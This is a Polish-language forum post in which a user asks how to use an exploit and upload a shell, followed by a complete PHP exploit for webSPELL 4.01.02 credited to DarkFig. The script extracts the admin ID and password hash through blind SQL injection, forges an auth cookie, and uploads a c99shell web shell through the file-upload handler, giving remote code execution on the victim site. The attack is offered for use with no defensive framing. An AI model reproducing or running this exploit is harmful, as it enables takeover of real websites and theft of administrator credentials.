webspell 4.01.02

M

michal_michal

Użytkownik
Dołączył
Lipiec 25, 2007
Posty
2
jak uzyc tego sploita? bo kompletnie nie rozumiem.. jak zapakowac tam shell?
<


Kod: 
#!/usr/bin/php

<?php

/**

 * This file require the PhpSploit class.

 * If you want to use this class, the latest

 * version can be downloaded from acid-root.new.fr.

 **/

require("phpsploitclass.php");

error_reporting(E_ALL ^ E_NOTICE);



# Admin id: 1

# Admin hash: 7b24afc8bc80e548d66c4e7ff72171c5

# Logged in (ws_auth=1%3A7b24afc8bc80e548d66c4e7ff72171c5)

# Trying to upload the malicious file

# Done ([url]http://localhost/webspell4.01.02/downloads/c99shell.php[/url])

#

if($argc < 5)

{

print ("

------   webSPELL <= 4.01.02 Remote PHP Code Execution Exploit   ------

-----------------------------------------------------------------------

PHP conditions: register_globals=On

       Credits: DarkFig <[email protected]>

           URL: [url]http://www.acid-root.new.fr/[/url]

-----------------------------------------------------------------------

  Usage: $argv[0] -url <> -file <> [Options]

 Params: -url       For example [url]http://victim.com/webspell/[/url] 

         -file      The file you wanna upload (c99shell.php...)

Options: -prefix    Table prefix (default=webs)

         -upmatch   The match which returns TRUE for the upload

         -sqlmatch  The match which returns TRUE for the SQL injection

         -proxy     If you wanna use a proxy <proxyhost:proxyport> 

         -proxyauth Basic authentification <proxyuser:proxypwd>

Example: $argv[0] -url [url]http://localhost/webspell/[/url] -file c99shell.php

-----------------------------------------------------------------------

");exit(1);

}



$url            = getparam('url',1);

$file           = getparam('file',1);

$prfix          = (getparam('prefix')!='')   ? getparam('prefix')   : 'webs';

$match_upload   = (getparam('upmatch')!='')  ? getparam('upmatch')  : 

';URL=index.php?site=files&file=';

$match_blindsql = (getparam('sqlmatch')!='') ? getparam('sqlmatch') : 

'site=profile&id=';

$proxy          = getparam('proxy');

$authp          = getparam('proxyauth');



$xpl = new phpsploit();

$xpl->agent("Mozilla Firefox");

if($proxy) $xpl->proxy($proxy);

if($authp) $xpl->proxyauth($authp);



print "nAdmin id: ";

$userid = blind('userID');



print "nAdmin hash: ";

$passwd = strtolower(blind('password'));



print "nLogged in (ws_auth=$userid%3A$passwd)";

$xpl->addcookie("ws_auth",$userid."%3A".$passwd);





# File upload vulnerability

#

# +files.php

# |

# 42. $action = $_GET['action'];

# 43. if($action=="save") {

# 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no 

access!", "3"));

# 46. $upfile = $_FILES[upfile];

# 69. $filepath = "./downloads/";

# 71. $des_file = $filepath.$upfile[name];

# 72. if(!file_exists($des_file)) {

# 73. if(move_uploaded_file($upfile[tmp_name], $des_file)) {

#

print "nTrying to upload the malicious file";

$frmdt = array(frmdt_url => $url.'index.php?site=files&action=save',

               "fileurl" => 1,

               "upfile"  => array(frmdt_filename => basename($file),

                                  frmdt_content  => file_get_contents($file)));



$xpl->formdata($frmdt);

if(preg_match("#$match_upload#si",$xpl->getcontent())) print "nDone";

else print "nFailed";

print " (${url}downloads/".basename($file).")n";





# Simple blind SQL injection (register_globals=On)

#

# +members.php

# |

# 31. if($_GET['action']=="show") {

# 32. if($_GET['squadID']) {

# 33. $getsquad = 'WHERE squadID="'.$_GET['squadID'].'"';

# 34. }

# 36. $ergebnis=safe_query("SELECT * FROM ".PREFIX."squads ".$getsquad." ORDER 

BY sort");

#

function blind($field)

{

        global $prfix,$xpl,$url,$match_blindsql;

        $d=0; $v='';

        

        if(!eregi('p',$field)) { $b=47;$c=57; } # 0-9

        else                   { $b=47;$c=70; } # 0-9a-z

        

        while(TRUE)

        {

                $d++;

                for($e=$b;$e<=$c;$e++)

                {

                    if($e==47) $f='NULL';

                    else $f=$e;



                    $sql = "WHERE SUBSTR((SELECT $field FROM ${prfix}_user 

WHERE userID="

                          ."(SELECT userID FROM ${prfix}_user_groups WHERE 

files=1 LIMIT 1)"

                          ." LIMIT 1),$d,1)=CHAR($f)";

               

                    

$xpl->get($url."index.php?site=members&action=show&getsquad=".urlencode($sql));

                    

if(preg_match("#$match_blindsql#",$xpl->getcontent(),$matches))

                    {

                        if($e==47)

                        {

                            return $v;

                        }

                        else

                        {

                            print strtolower(chr($f));

                            $v .= chr($f);

                            break;

                        }

                    }

                }

        }

}



function getparam($param,$opt='')

{

        global $argv;

        foreach($argv as $value => $key)

        {

                if($key == '-'.$param) return $argv[$value+1];

        }

        if($opt) exit("n-$param parameter required");

        else return;

}



if(!function_exists('file_get_contents')) {

        function file_get_contents($file)

        {

                $handle  = fopen($file, "r");

                $content = fread($fd, filesize($file));

                fclose($handle);

                return $content;

        }

}



?>
 
You must log in or register to reply here.
Do góry Bottom